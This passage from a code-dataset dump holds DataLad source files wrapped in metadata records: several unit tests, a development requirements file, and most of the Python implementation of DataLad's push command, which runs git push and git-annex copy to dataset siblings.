subds_modified.pathobj / 'subdir' / 'gone']},\n []),\n #\n # now error case\n #\n # a path that does sort under the root dataset\n ((path, [otherds.pathobj / 'totally' / 'different']),\n {},\n [otherds.pathobj / 'totally' / 'different']),\n )\n # evaluate the test cases\n for inp, pbd_target, error_target in testcases:\n paths_by_ds, errors = get_paths_by_ds(ds, *inp)\n assert_dict_equal(pbd_target, paths_by_ds)\n eq_(error_target, errors)\n\n # lastly, some more specialized test\n # paths get collapsed into dataset records, even when the path\n # order is not presorted to match individual datasets sequentially\n paths_by_ds, errors = get_paths_by_ds(\n ds, ds, [\n op.join('subdir', 'git_file.txt'),\n op.join('subds_modified', 'subdir'),\n op.join('subdir', 'annexed_file.txt'),\n ])\n eq_(\n list(paths_by_ds.keys()),\n [ds.pathobj, subds_modified.pathobj]\n )\n # result order 
(top-level first) is stable, even when a path comes first\n # that sorts later. Also mixed types are not a problem\n paths_by_ds, errors = get_paths_by_ds(\n ds, ds, [\n ds.pathobj / 'subds_modified' / 'subdir',\n op.join('subdir', 'git_file.txt'),\n op.join('subds_modified', 'subdir', 'annexed_file.txt'),\n ])\n eq_(\n list(paths_by_ds.keys()),\n [ds.pathobj, subds_modified.pathobj]\n )\n" }, { "alpha_fraction": 0.5980921983718872, "alphanum_fraction": 0.6270270347595215, "avg_line_length": 31.09183692932129, "blob_id": "88bdbf39b1f035180373c2bf85eb703fedef901e", "content_id": "2715ec14700bf69328abb7b08a5beba3790b4b8b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3145, "license_type": "permissive", "max_line_length": 101, "num_lines": 98, "path": "/datalad/support/tests/test_stats.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom ...tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_not_equal,\n assert_raises,\n)\nfrom ..stats import (\n _COUNTS,\n ActivityStats,\n)\n\n\ndef test_ActivityStats_basic():\n stats = ActivityStats()\n assert_raises(AttributeError, setattr, stats, \"unknown_attribute\", 1)\n\n for c in _COUNTS:\n assert_equal(getattr(stats, c), 0)\n\n stats.files += 1\n assert_equal(stats.files, 1)\n stats.increment('files')\n assert_equal(stats.files, 2)\n\n assert_equal(stats.as_dict()['files'], 2)\n # smoke tests\n assert_equal(stats.as_str(), stats.as_str(mode='full'))\n assert_equal(len(stats.as_str(mode='line').split('\\n')), 1)\n\n assert_in('files=2', repr(stats))\n stats.reset()\n for c in _COUNTS:\n assert_equal(getattr(stats, c), 0)\n\n # Check a copy of stats\n stats_total = stats.get_total()\n assert_equal(stats_total.files, 2)\n stats.files += 1\n assert_equal(stats.files, 1)\n assert_equal(stats_total.files, 2) # shouldn't change -- a copy!\n\n # Let's add some merges\n stats.merges.append(('upstream', 'master'))\n stats_total = stats.get_total()\n assert_equal(stats_total.merges, stats.merges)\n\n assert_equal(stats.as_str(), \"\"\"Files processed: 1\nBranches merged: upstream->master\"\"\")\n assert_equal(stats.as_str(mode='line'), \"Files processed: 1, Branches merged: upstream->master\")\n\n stats.urls += 2\n stats.downloaded += 1\n stats.downloaded_size += 123456789 # will invoke formatter\n assert_in(\"size: 123.5 MB\", stats.as_str())\n\ndef test_ActivityStats_comparisons():\n stats1 = ActivityStats()\n stats2 = ActivityStats()\n assert_equal(stats1, stats2)\n stats1.files += 1\n assert_not_equal(stats1, stats2)\n\n # if we reset -- should get back the same although totals should be different\n stats1.reset()\n assert_equal(stats1.as_str(), stats2.as_str())\n assert_equal(stats1, stats2)\n assert_not_equal(stats1.get_total(), stats2.get_total())\n #stats1.reset(full=True)\n #assert_equal(stats1, stats2)\n\ndef test_add():\n stats1 = ActivityStats()\n stats2 = ActivityStats()\n stats1.files += 1\n stats2.files += 1\n stats2.urls += 1\n assert_equal(stats1, ActivityStats(files=1))\n assert_equal(stats2, ActivityStats(files=1, urls=1))\n\n stats1 += 
stats2\n assert_equal(stats1, ActivityStats(files=2, urls=1))\n assert_equal(stats1.get_total(), ActivityStats(files=2, urls=1))\n\n stats3 = stats1 + stats2\n # no changes to stats1 or stats2\n assert_equal(stats1, ActivityStats(files=2, urls=1))\n assert_equal(stats1.get_total(), ActivityStats(files=2, urls=1))\n assert_equal(stats2, ActivityStats(files=1, urls=1))\n assert_equal(stats3.get_total(), ActivityStats(files=3, urls=2))\n" }, { "alpha_fraction": 0.7488788962364197, "alphanum_fraction": 0.7488788962364197, "avg_line_length": 54.75, "blob_id": "c2270506a53bee9b47fb50455ee4dca9da315d9a", "content_id": "1fb3115d7130ecd55cecb9afcad34cbabc2a5809", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 223, "license_type": "permissive", "max_line_length": 88, "num_lines": 4, "path": "/requirements-devel.txt", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# Theoretically we don't want -e here but ATM pip would puke if just .[full] is provided\n# Since we use requirements.txt ATM only for development IMHO it is ok but\n# we need to figure out/complaint to pip folks\n-e .[devel]\n" }, { "alpha_fraction": 0.5580029487609863, "alphanum_fraction": 0.5624082088470459, "avg_line_length": 26.239999771118164, "blob_id": "f7ccc300e97bbba3a68caaeed3349914d08f7439", "content_id": "193fbc456827cbee82a5ca29ce6835defc92187e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 681, "license_type": "permissive", "max_line_length": 79, "num_lines": 25, "path": "/datalad/distribution/tests/test_uninstall.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test uninstall action\n\n\"\"\"\n\nimport pytest\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n with_tempfile,\n)\n\n\[email protected](\"ignore: The `uninstall` command is deprecated\")\n@with_tempfile()\ndef test_uninstall_uninstalled(path=None):\n ds = Dataset(path)\n assert_raises(ValueError, ds.uninstall)\n" }, { "alpha_fraction": 0.565045177936554, "alphanum_fraction": 0.5674326419830322, "avg_line_length": 38.211700439453125, "blob_id": "e1667e18bf6ad62e3b3d265dc9c3d84f96e1792b", "content_id": "e352987cb125304e3854c03e2a990648ce67ba85", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36859, "license_type": "permissive", "max_line_length": 99, "num_lines": 940, "path": "/datalad/core/distributed/push.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface for dataset (component) pushing\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom itertools import chain\nimport logging\nimport re\n\nfrom 
datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n recursion_limit,\n recursion_flag,\n)\nfrom datalad.interface.utils import render_action_summary\nfrom datalad.interface.results import annexjson2result\nfrom datalad.log import log_progress\nfrom datalad.support.annexrepo import (\n AnnexRepo,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureStr,\n EnsureNone,\n EnsureChoice,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.utils import (\n Path,\n ensure_list,\n todo_interface_for_extensions,\n)\n\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.core.local.diff import diff_dataset\n\n\nlgr = logging.getLogger('datalad.core.distributed.push')\n\n\n@build_doc\nclass Push(Interface):\n \"\"\"Push a dataset to a known :term:`sibling`.\n\n This makes a saved state of a dataset available to a sibling or special\n remote data store of a dataset. Any target sibling must already exist and\n be known to the dataset.\n\n || REFLOW >>\n By default, all files tracked in the last saved state (of the current\n branch) will be copied to the target location. Optionally, it is possible\n to limit a push to changes relative to a particular point in the version\n history of a dataset (e.g. a release tag) using the\n [CMD: --since CMD][PY: since PY] option in conjunction with the\n specification of a reference dataset. In recursive mode subdatasets will also be\n evaluated, and only those subdatasets are pushed where a change was\n recorded that is reflected in the current state of the top-level reference\n dataset.\n << REFLOW ||\n\n .. note::\n Power-user info: This command uses :command:`git push`, and :command:`git\n annex copy` to push a dataset. Publication targets are either configured\n remote Git repositories, or git-annex special remotes (if they support\n data upload).\n \"\"\"\n\n # TODO add examples\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to push\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n to=Parameter(\n args=(\"--to\",),\n metavar='SIBLING',\n doc=\"\"\"name of the target sibling. If no name is given an attempt is\n made to identify the target based on the dataset's configuration\n (i.e. a configured tracking branch, or a single sibling that is\n configured for push)\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n since=Parameter(\n args=(\"--since\",),\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"specifies commit-ish (tag, shasum, etc.) from which to look for\n changes to decide whether pushing is necessary.\n If '^' is given, the last state of the current branch at the sibling\n is taken as a starting point.\"\"\"),\n path=Parameter(\n args=(\"path\",),\n metavar='PATH',\n doc=\"\"\"path to constrain a push to. If given, only\n data or changes for those paths are considered for a push.\"\"\",\n nargs='*',\n constraints=EnsureStr() | EnsureNone()),\n data=Parameter(\n args=(\"--data\",),\n doc=\"\"\"what to do with (annex'ed) data. 'anything' would cause\n transfer of all annexed content, 'nothing' would avoid call to\n `git annex copy` altogether. 
'auto' would use 'git annex copy' with\n '--auto' thus transferring only data which would satisfy \"wanted\"\n or \"numcopies\" settings for the remote (thus \"nothing\" otherwise).\n 'auto-if-wanted' would enable '--auto' mode only if there is a \n \"wanted\" setting for the remote, and transfer 'anything' otherwise.\n \"\"\",\n constraints=EnsureChoice(\n 'anything', 'nothing', 'auto', 'auto-if-wanted')),\n force=Parameter(\n # multi-mode option https://github.com/datalad/datalad/issues/3414\n args=(\"-f\", \"--force\",),\n doc=\"\"\"force particular operations, possibly overruling safety\n protections or optimizations: use --force with git-push ('gitpush');\n do not use --fast with git-annex copy ('checkdatapresent');\n combine all force modes ('all').\"\"\",\n constraints=EnsureChoice(\n 'all', 'gitpush', 'checkdatapresent', None)),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n jobs=jobs_opt,\n )\n\n # Desired features:\n # - let Git do it's thing (push multiple configured refs without the need\n # to specific anything on the command line\n # - compilication: we need publication dependencies (i.e. publish what\n # would be published by Git to a different remote first, hence we\n # cannot simply watch Git do it, and later act on it.)\n # - https://github.com/datalad/datalad/issues/1284\n # - https://github.com/datalad/datalad/issues/4006\n # - make differences between remotes and various types of special remotes\n # opaque\n # - https://github.com/datalad/datalad/issues/3127\n # - informative and comprehensive (error) reporting\n # - https://github.com/datalad/datalad/issues/2000\n # - https://github.com/datalad/datalad/issues/1682\n # - https://github.com/datalad/datalad/issues/2029\n # - https://github.com/datalad/datalad/issues/2855\n # - https://github.com/datalad/datalad/issues/3412\n # - https://github.com/datalad/datalad/issues/3424\n # - ensure robust behavior in multi-lateral push scenarios (updating\n # a dataset that was updated by a 3rd-party after the last known\n # fetched change\n # - https://github.com/datalad/datalad/issues/2636\n # - should NOT mimic `publish` and that it mixes `create-sibling` and\n # `push` into a single operation. This would fold the complexity\n # of all possible ways a local dataset hierarchy could possibly\n # connected to remote ends into this command. It would be lost battle\n # from the start.\n # - not tackle: https://github.com/datalad/datalad/issues/2186\n # - maintain standard setup, and not reflect procedural aspects\n # onto the resulting outcomes\n # - https://github.com/datalad/datalad/issues/2001\n # - do a straight push, nothing like 'sync'. If a remote has something that\n # needs merging first, fail and let users update. Any diff we are missing\n # locally can impact decision making via --since and friends.\n\n @staticmethod\n @datasetmethod(name='push')\n @eval_results\n def __call__(\n path=None,\n *,\n dataset=None,\n to=None,\n since=None,\n data='auto-if-wanted',\n force=None,\n recursive=False,\n recursion_limit=None,\n jobs=None):\n # push uses '^' to annotate the previous pushed committish, and None for default\n # behavior. '' was/is (to be deprecated) used in `publish`. 
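        # A rough usage sketch, assuming a dataset `ds` with a sibling named
        # 'origin' (both names illustrative):
        #   ds.push(to='origin')                # refspecs, plus data per 'auto-if-wanted'
        #   ds.push(to='origin', since='^')     # only changes since the last known push state
        #   ds.push(to='origin', data='nothing', force='gitpush')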
Alert user about the mistake\n if since == '':\n raise ValueError(\"'since' should point to commitish or use '^'.\")\n # we resolve here, because we need to perform inspection on what was given\n # as an input argument further down\n paths = [resolve_path(p, dataset) for p in ensure_list(path)]\n\n ds = require_dataset(\n dataset, check_installed=True, purpose='push')\n ds_repo = ds.repo\n\n res_kwargs = dict(\n action='publish',\n refds=ds.path,\n logger=lgr,\n )\n\n get_remote_kwargs = {'exclude_special_remotes': False} \\\n if isinstance(ds_repo, AnnexRepo) else {}\n if to and to not in ds_repo.get_remotes(**get_remote_kwargs):\n # get again for proper error:\n sr = ds_repo.get_remotes(**get_remote_kwargs)\n # yield an error result instead of raising a ValueError,\n # to enable the use case of pushing to a target that\n # a superdataset doesn't know, but some subdatasets to\n # (in combination with '--on-failure ignore')\n yield dict(\n res_kwargs,\n status='error',\n path=ds.path,\n message=\"Unknown push target '{}'. {}\".format(\n to,\n 'Known targets: {}.'.format(', '.join(repr(s) for s in sr))\n if sr\n else 'No targets configured in dataset.'))\n return\n if since == '^':\n # figure out state of remote branch and set `since`\n since = _get_corresponding_remote_state(ds_repo, to)\n if not since:\n lgr.info(\n \"No tracked remote for active branch, \"\n \"detection of last pushed state not in effect.\")\n elif since:\n # will blow with ValueError if unusable\n ds_repo.get_hexsha(since)\n\n\n # obtain a generator for information on the datasets to process\n # idea is to turn the `paths` argument into per-dataset\n # content listings that can be acted upon\n ds_spec = _datasets_since_(\n # important to pass unchanged dataset arg\n dataset,\n since,\n paths,\n recursive,\n recursion_limit)\n\n # instead of a loop, this could all be done in parallel\n matched_anything = False\n for dspath, dsrecords in ds_spec:\n matched_anything = True\n lgr.debug('Pushing Dataset at %s', dspath)\n pbars = {}\n yield from _push(\n dspath, dsrecords, to, data, force, jobs, res_kwargs.copy(), pbars,\n got_path_arg=True if path else False)\n # take down progress bars for this dataset\n for i, ds in pbars.items():\n log_progress(lgr.info, i, 'Finished push of %s', ds)\n if not matched_anything:\n potential_remote = False\n if not to and len(paths) == 1:\n # if we get a remote name without --to, provide a hint\n sr = ds_repo.get_remotes(**get_remote_kwargs)\n potential_remote = [\n p for p in ensure_list(path) if p in sr\n ]\n if potential_remote:\n if len(potential_remote) == 1:\n # present as a single value to make hint even more human\n # friendly\n potential_remote = potential_remote[0]\n hint = \"{} matches a sibling name and not a path. 
\" \\\n \"Forgot --to?\".format(potential_remote)\n yield dict(\n res_kwargs,\n status='notneeded',\n message=hint,\n hints=hint,\n type='dataset',\n path=ds.path,\n )\n # there's no matching path and we have generated a hint on\n # fixing the call - we can return now\n return\n yield dict(\n res_kwargs,\n status='notneeded',\n message='Given constraints did not match any changes to publish',\n type='dataset',\n path=ds.path,\n )\n\n custom_result_summary_renderer_pass_summary = True\n\n @staticmethod\n def custom_result_summary_renderer(results, action_summary): # pragma: more cover\n render_action_summary(action_summary)\n # report on any hints at the end\n # get all unique hints\n hints = set([r.get('hints', None) for r in results])\n hints = [hint for hint in hints if hint is not None]\n if hints:\n from datalad.ui import ui\n from datalad.support import ansi_colors\n intro = ansi_colors.color_word(\n \"Hints: \",\n ansi_colors.YELLOW)\n ui.message(intro)\n [ui.message(\"{}: {}\".format(\n ansi_colors.color_word(id + 1, ansi_colors.YELLOW), hint))\n for id, hint in enumerate(hints)]\n\n\n\ndef _datasets_since_(dataset, since, paths, recursive, recursion_limit):\n \"\"\"Generator\"\"\"\n # rely on diff() reporting sequentially across datasets\n cur_ds = None\n ds_res = None\n for res in diff_dataset(\n dataset=dataset,\n fr=since,\n # we never touch unsaved content\n to='HEAD',\n constant_refs=False,\n path=paths,\n # we need to know what is around locally to be able\n # to report something that should have been pushed\n # but could not, because we don't have a copy.\n # however, getting this info here is needlessly\n # expensive, we will do it at the latest possible stage\n # in _push_data()\n annex=None,\n recursive=recursive,\n recursion_limit=recursion_limit,\n # TODO?: expose order as an option for diff and push\n # since in some cases breadth-first would be sufficient\n # and result in \"taking action faster\"\n reporting_order='bottom-up'\n ):\n if res.get('action', None) != 'diff':\n # we don't care right now\n continue\n if res.get('status', None) != 'ok':\n # we cannot handle this situation, report it in panic\n raise RuntimeError(\n 'Cannot handle non-OK diff result: {}'.format(res))\n parentds = res.get('parentds', None)\n if not parentds:\n raise RuntimeError(\n 'Cannot handle diff result without a parent dataset '\n 'property: {}'.format(res))\n if res.get('type', None) == 'dataset':\n # a subdataset record in another dataset\n # this could be here, because\n # - this dataset was explicitly requested by path\n # -> should get a dedicated dataset record -- even without recursion\n # - a path within an existing subdataset was given\n # - a path within an non-existing subdataset was given\n # locally or not)\n # -> it should be ignored, but should not cause the branch in the\n # superdataset not to be pushed, if this was the only change\n p = Path(res['path'])\n # was given as an explicit path argument\n if any(arg == p for arg in paths) and \\\n not GitRepo.is_valid_repo(res['path']):\n raise ValueError(\n 'Cannot publish subdataset, not present: {}'.format(res['path']))\n\n if parentds != cur_ds:\n if ds_res:\n # we switch to another dataset, yield this one so outside\n # code can start processing immediately\n yield (cur_ds, ds_res)\n # clean start\n ds_res = []\n cur_ds = parentds\n ds_res.append({\n k: v for k, v in res.items()\n if k in (\n # let's keep 'state' in for now, it would make it possible\n # to implement a \"sync\"-type push downstream that actually\n # pulls 
'deleted' files\n 'state',\n # 'file' to copy-to, and subdataset records to possibly\n # act on\n 'type',\n # essential\n 'path')\n })\n\n # if we have something left to report, do it\n # importantly do not test for ds_res, even if we had only seen subdataset\n # records to be changes, we would still want to push the git branches\n if cur_ds:\n yield (cur_ds, ds_res)\n\n\n@todo_interface_for_extensions\ndef _transfer_data(repo, ds, target, content, data, force, jobs, res_kwargs,\n got_path_arg):\n yield from _push_data(\n ds,\n target,\n content,\n data,\n force,\n jobs,\n res_kwargs.copy(),\n got_path_arg=got_path_arg,\n )\n\n\ndef _push(dspath, content, target, data, force, jobs, res_kwargs, pbars,\n got_path_arg=False):\n force_git_push = force in ('all', 'gitpush')\n\n # nothing recursive in here, we only need a repo to work with\n ds = Dataset(dspath)\n repo = ds.repo\n\n res_kwargs.update(type='dataset', path=dspath)\n\n # content will be unique for every push (even on the same dataset)\n pbar_id = 'push-{}-{}'.format(target, id(content))\n # register for final orderly take down\n pbars[pbar_id] = ds\n log_progress(\n lgr.info, pbar_id,\n 'Determine push target',\n unit=' Steps',\n label='Push',\n total=4,\n )\n # pristine input arg\n _target = target\n # verified or auto-detected\n target = None\n if not _target:\n try:\n try:\n # let Git figure out what needs doing\n # we will reuse the result further down again, so nothing is wasted\n wannabe_gitpush = repo.push(remote=None, git_options=['--dry-run'])\n # we did not get an explicit push target, get it from Git\n target = set(p.get('remote', None) for p in wannabe_gitpush)\n # handle case where a pushinfo record did not have a 'remote'\n # property -- should not happen, but be robust\n target.discard(None)\n except CommandError as e:\n if 'Please make sure you have the correct access rights' in e.stderr:\n # there is a default push target but we have no permission\n yield dict(\n res_kwargs,\n status='impossible',\n message='Attempt to push to default target resulted in following '\n 'error. 
Address the error or specify different target with --to: '\n + e.stderr,\n )\n return\n raise\n except Exception as e:\n lgr.debug(\n 'Dry-run push to determine default push target failed, '\n 'assume no configuration: %s', e)\n target = set()\n if not len(target):\n yield dict(\n res_kwargs,\n status='impossible',\n message='No push target given, and none could be '\n 'auto-detected, please specify via --to',\n )\n return\n elif len(target) > 1:\n # dunno if this can ever happen, but if it does, report\n # nicely\n yield dict(\n res_kwargs,\n status='error',\n message=(\n 'No push target given, '\n 'multiple candidates auto-detected: %s',\n list(target),\n )\n )\n return\n else:\n # can only be a single one at this point\n target = target.pop()\n\n if not target:\n if _target not in repo.get_remotes():\n yield dict(\n res_kwargs,\n status='error',\n message=(\n \"Unknown target sibling '%s'.\", _target))\n return\n target = _target\n\n log_progress(\n lgr.info, pbar_id, \"Push refspecs\",\n label=\"Push to '{}'\".format(target), update=1, total=4)\n\n # define config var name for potential publication dependencies\n depvar = 'remote.{}.datalad-publish-depends'.format(target)\n # list of remotes that are publication dependencies for the\n # target remote\n publish_depends = ensure_list(ds.config.get(depvar, [], get_all=True))\n if publish_depends:\n lgr.debug(\"Discovered publication dependencies for '%s': %s'\",\n target, publish_depends)\n\n # cache repo type\n is_annex_repo = isinstance(ds.repo, AnnexRepo)\n\n # TODO prevent this when `target` is a special remote\n # (possibly redo) a push attempt to figure out what needs pushing\n # do this on the main target only, and apply the result to all\n # dependencies\n try:\n if _target:\n # only do it when an explicit target was given, otherwise\n # we can reuse the result from the auto-probing above\n wannabe_gitpush = repo.push(\n remote=target,\n git_options=['--dry-run'])\n except Exception as e:\n lgr.debug(\n 'Dry-run push to check push configuration failed, '\n 'assume no configuration: %s', e)\n wannabe_gitpush = []\n refspecs2push = [\n # if an upstream branch is set, go with it\n p['from_ref']\n if ds.config.get(\n # refs come in as refs/heads/<branchname>\n # need to cut the prefix\n 'branch.{}.remote'.format(p['from_ref'][11:]),\n None) == target and ds.config.get(\n 'branch.{}.merge'.format(p['from_ref'][11:]),\n None)\n # if not, define target refspec explicitly to avoid having to\n # set an upstream branch, which would happen implicitly from\n # a users POV, and may also be hard to decide when publication\n # dependencies are present\n else '{}:{}'.format(p['from_ref'], p['to_ref'])\n for p in wannabe_gitpush\n # TODO: what if a publication dependency doesn't have it yet\n # should we not attempt to push, because the main target has it?\n if 'uptodate' not in p['operations'] and (\n # cannot think of a scenario where we would want to push a\n # managed branch directly, instead of the corresponding branch\n 'refs/heads/adjusted' not in p['from_ref'])\n ]\n # TODO this is not right with managed branches\n active_branch = repo.get_active_branch()\n if active_branch and is_annex_repo:\n # we could face a managed branch, in which case we need to\n # determine the actual one and make sure it is sync'ed with the\n # managed one, and push that one instead. 
following methods can\n # be called unconditionally\n repo.localsync(managed_only=True)\n active_branch = repo.get_corresponding_branch(\n active_branch) or active_branch\n\n if not refspecs2push and not active_branch:\n # nothing was set up for push, and we have no active branch\n # this is a weird one, let's confess and stop here\n # I don't think we need to support such a scenario\n if not active_branch:\n yield dict(\n res_kwargs,\n status='impossible',\n message=\n 'There is no active branch, cannot determine remote '\n 'branch'\n )\n return\n\n # make sure that we always push the active branch (the context for the\n # potential path arguments) and the annex branch -- because we claim\n # to know better than any git config\n must_have_branches = [active_branch] if active_branch else []\n if is_annex_repo:\n must_have_branches.append('git-annex')\n for branch in must_have_branches:\n _append_branch_to_refspec_if_needed(ds, refspecs2push, branch)\n\n # we know what to push and where, now dependency processing first\n for r in publish_depends:\n # simply make a call to this function again, all the same, but\n # target is different\n yield from _push(\n dspath,\n content,\n # to this particular dependency\n r,\n data,\n force,\n jobs,\n res_kwargs.copy(),\n pbars,\n got_path_arg=got_path_arg,\n )\n\n # and lastly the primary push target\n target_is_git_remote = repo.config.get(\n 'remote.{}.url'.format(target), None) is not None\n\n # git-annex data copy\n #\n if is_annex_repo:\n if data != \"nothing\":\n log_progress(\n lgr.info, pbar_id, \"Transfer data\",\n label=\"Transfer data to '{}'\".format(target), update=2, total=4)\n yield from _transfer_data(\n repo,\n ds,\n target,\n content,\n data,\n force,\n jobs,\n res_kwargs.copy(),\n got_path_arg=got_path_arg,\n )\n else:\n lgr.debug(\"Data transfer to '%s' disabled by argument\", target)\n else:\n lgr.debug(\"No data transfer: %s is not a git annex repository\", repo)\n\n if not target_is_git_remote:\n # there is nothing that we need to push or sync with on the git-side\n # of things with this remote\n return\n\n log_progress(\n lgr.info, pbar_id, \"Update availability information\",\n label=\"Update availability for '{}'\".format(target), update=3, total=4)\n\n # TODO fetch is only needed if anything was actually transferred. Collect this\n # info and make the following conditional on it\n\n # after file transfer the remote might have different commits to\n # the annex branch. 
They have to be merged locally, otherwise a\n # push of it further down will fail\n try:\n # fetch remote, let annex sync them locally, so that the push\n # later on works.\n # We have to fetch via the push url (if there is any),\n # not a pull url.\n # The latter might be dumb and without the execution of a\n # post-update hook we might not be able to retrieve the\n # server-side git-annex branch updates (and git-annex does\n # not trigger the hook on copy), but we know we have\n # full access via the push url -- we have just used it to copy.\n lgr.debug(\"Fetching 'git-annex' branch updates from '%s'\", target)\n fetch_cmd = ['fetch', target, 'git-annex']\n pushurl = repo.config.get(\n 'remote.{}.pushurl'.format(target), None)\n if pushurl:\n # for some reason overwriting remote.{target}.url\n # does not have any effect...\n fetch_cmd = [\n '-c',\n 'url.{}.insteadof={}'.format(\n pushurl,\n repo.config.get(\n 'remote.{}.url'.format(target), None)\n )\n ] + fetch_cmd\n lgr.debug(\n \"Sync local annex branch from pushurl after remote \"\n 'availability update.')\n repo.call_git(fetch_cmd)\n # If no CommandError was raised, it means that remote has git-annex\n # but local repo might not be an annex yet. Since there is nothing to \"sync\"\n # from us, we just skip localsync without mutating repo into an AnnexRepo\n if is_annex_repo:\n repo.localsync(target)\n except CommandError as e:\n # it is OK if the remote doesn't have a git-annex branch yet\n # (e.g. fresh repo)\n # TODO is this possible? we just copied? Maybe check if anything\n # was actually copied?\n if \"fatal: couldn't find remote ref git-annex\" not in e.stderr.lower():\n raise\n lgr.debug('Remote does not have a git-annex branch: %s', e)\n\n if not refspecs2push:\n lgr.debug('No refspecs found that need to be pushed')\n return\n\n # and push all relevant branches, plus the git-annex branch to announce\n # local availability info too\n yield from _push_refspecs(\n repo,\n target,\n refspecs2push,\n force_git_push,\n res_kwargs.copy(),\n )\n\n\ndef _append_branch_to_refspec_if_needed(ds, refspecs, branch):\n # try to anticipate any flavor of an idea of a branch ending up in a refspec\n looks_like_that_branch = re.compile(\n r'((^|.*:)refs/heads/|.*:|^){}$'.format(branch))\n if all(not looks_like_that_branch.match(r) for r in refspecs):\n refspecs.append(\n branch\n if ds.config.get('branch.{}.merge'.format(branch), None)\n else '{branch}:{branch}'.format(branch=branch)\n )\n\n\ndef _push_refspecs(repo, target, refspecs, force_git_push, res_kwargs):\n push_res = repo.push(\n remote=target,\n refspec=refspecs,\n git_options=['--force'] if force_git_push else None,\n )\n # TODO maybe compress into a single message whenever everything is\n # OK?\n for pr in push_res:\n ops = pr['operations']\n status = (\n 'error'\n if any(o in ops for o in (\n 'error', 'no-match', 'rejected', 'remote-rejected',\n 'remote-failure'))\n else 'notneeded'\n if 'uptodate' in pr['operations']\n else 'ok'\n if any(o in ops for o in (\n 'new-tag', 'new-branch', 'forced-update', 'fast-forward'))\n # no really a good fit, but we have tested all relevant\n # operations above, so in some sense this condition should be\n # impossible to achieve\n else 'impossible'\n )\n refspec = '{}:{}'.format(pr['from_ref'], pr['to_ref'])\n yield dict(\n res_kwargs,\n status=status,\n target=pr['remote'],\n refspec=refspec,\n operations=ops,\n hints=pr.get('hints', None),\n # seems like a good idea to pass on Git's native message\n # TODO maybe implement a dedicated result 
renderer, instead\n # of duplicating information only so that the default one\n # can make sense at all\n message='{}->{}:{} {}'.format(\n pr['from_ref'],\n pr['remote'],\n pr['to_ref'],\n pr['note']),\n )\n\n\ndef _push_data(ds, target, content, data, force, jobs, res_kwargs,\n got_path_arg=False):\n if ds.config.getbool('remote.{}'.format(target), 'annex-ignore', False):\n lgr.debug(\n \"Target '%s' is set to annex-ignore, exclude from data-push.\",\n target,\n )\n return\n\n ds_repo = ds.repo\n\n res_kwargs['target'] = target\n if not ds.config.get('.'.join(('remote', target, 'annex-uuid')), None):\n # this remote either isn't an annex,\n # or hasn't been properly initialized\n # given that there was no annex-ignore, let's try to init it\n # see https://github.com/datalad/datalad/issues/5143 for the story\n ds_repo.localsync(target)\n\n if not ds.config.get('.'.join(('remote', target, 'annex-uuid')), None):\n # still nothing\n # rather than barfing tons of messages for each file, do one\n # for the entire dataset\n yield dict(\n res_kwargs,\n action='copy',\n status='impossible'\n if force in ('all', 'checkdatapresent')\n else 'notneeded',\n message=(\n \"Target '%s' does not appear to be an annex remote\",\n target)\n )\n return\n\n # it really looks like we will transfer files, get info on what annex\n # has in store\n # paths must be recoded to a dataset REPO root (in case of a symlinked\n # location\n annex_info_init = \\\n {ds_repo.pathobj / Path(c['path']).relative_to(ds.pathobj): c\n for c in content} if ds.pathobj != ds_repo.pathobj else \\\n {Path(c['path']): c for c in content}\n content = ds.repo.get_content_annexinfo(\n # paths are taken from `annex_info_init`\n paths=None,\n init=annex_info_init,\n ref='HEAD',\n # this is an expensive operation that is only needed\n # to perform a warning below, and for more accurate\n # progress reporting (exclude unavailable content).\n # limit to cases with explicit paths provided\n eval_availability=True if got_path_arg else False,\n )\n # figure out which of the reported content (after evaluating\n # `since` and `path` arguments needs transport\n to_transfer = [\n c\n for c in content.values()\n # by force\n if ((force in ('all', 'checkdatapresent') or\n # 